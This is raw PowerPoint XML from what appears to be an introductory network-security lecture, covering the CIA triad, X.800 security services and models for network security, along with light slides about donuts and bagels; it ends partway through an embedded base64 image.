                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Moderate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>High</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ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>Examples of Security Requirements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73731" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>confidentiality – student grades</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>integrity – patient information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>availability – authentication service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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OSI Security Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77827" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8382000" cy="4454525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>ITU-T X.800 “Security Architecture for OSI”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>defines a systematic way of defining and providing security requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>for us it provides a useful, if abstract, overview of concepts we will study</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77828"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648200"/>
            <a:ext cx="3446463" cy="192722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Course Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2800" dirty="0"/>
              <a:t>Part 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>Cryptography</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2800" dirty="0"/>
              <a:t> on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>field</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>Hashing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>Asymmetric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2400" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>Symmetric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>Cryptography</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2400" dirty="0"/>
              <a:t>, PKI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2800" dirty="0"/>
              <a:t>Part 2: a travel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2800" dirty="0"/>
              <a:t> the security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>aspects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2800" dirty="0"/>
              <a:t> of the TCP/IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="68580" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" altLang="it-IT" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18437" name="Immagin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142" y="4149080"/>
            <a:ext cx="1728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www.gns3.com/assets/images/logo-colou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072" y="4038600"/>
            <a:ext cx="183832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ali-2020.2-release">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C67D67BD-EDD7-4241-8EDE-EC681681F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8686" y="3640832"/>
            <a:ext cx="3944491" cy="1403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1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Security Services</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79875" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8229600" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:t>X.800:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:t>“a service provided by a protocol layer of communicating open systems, which ensures adequate security of the systems or of data transfers”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:t>RFC 2828:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:t>“a processing or communication service provided by a system to give a specific kind of protection to system resources”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fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Model for Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>using this model requires us to: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design a suitable algorithm for the security transformation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generate the secret information (keys) used by the algorithm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develop methods to distribute and share the secret information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specify a protocol enabling the principals to use the transformation and secret information for a security service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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>Model for Network Access Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>using this model requires us to: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select appropriate gatekeeper functions to identify users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>implement security controls to ensure only authorised users access designated information or resources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fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>topic roadmap &amp; standards organizations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>security concepts:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>confidentiality, integrity, availability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>X.800 security architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>security attacks, services, mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>models for network (access) security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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FOOD of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>day</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55299" name="Segnaposto contenuto 3" descr="Doughnut - Wikipedia, the free encyclopedia - Google Chrome"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="71896" t="34058" r="2979" b="16907"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="250825" y="1412875"/>
            <a:ext cx="4249738" cy="4540250"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CasellaDiTesto 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4540250" y="1692275"/>
            <a:ext cx="4424363" cy="1754188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>known</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> the «Ciambelle di Homer»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>From «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>dough</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>» &amp; «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>nut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>donut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>»</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>salty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>? No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>these</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> are the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>bagels</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1" i="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248330735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NERD THING of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>day</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="AutoShape 6" descr="data:image/jpeg;base64,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